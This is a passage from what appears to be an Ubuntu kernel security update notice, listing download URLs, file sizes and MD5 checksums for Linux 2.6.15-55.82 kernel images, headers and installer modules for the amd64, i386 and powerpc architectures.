    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   287606 f3cc835959f215c209dc5a825596849c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
      Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
      Size/MD5:   872448 1a70a906bccd7642241535f79feddb57
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
      Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
      Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb
      Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
      Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
      Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
      Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
      Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   202666 71d8be83541874d6c675945838b9e223
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    49294 e4a805200acaaea274e67995602294e6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    35158 0869bee234a54b1afe362123606efe66
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    33806 ebf707126fa6326899d648786afa8779
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:    38938 75eb074224a6373013e621cdd5931a51
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
      Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb
      Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb
      Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb
      Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
      Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb
      Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb
      Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb
      Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb
      Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb
      Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
      Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb
      Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    53554 afc415fd0a28c363579986fc48464671
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    98468 ddb974591a687460f50c26a2e2682593
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
      Size/MD5:   299158 458051a07217501718f6e2a742bec0a3

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    51536 d2c7a02ac033097208c359312e95d246
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:     2482 3c964c577c93d80cee55d06e78003951
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    40906 84f84dc75718a347eb6623204cab6209
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    29892 4a807f384985ae3376d509474716f13a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    45054 a2373aac90339698b2cba11e43978565
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:     1934 0887612df6acbc867949c33251427c00
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:     2198 d38a4ec22579275ff2f48805be734356
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   161908 70564b18529d383509cb4c1d4898425a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
      Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
      Size/MD5:   872596 8602056ab95806f02667587737cb3b59
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
      Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb
      Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
      Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
      Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
      Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    17386 1abc2376b554610aec23e87f60998358
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5
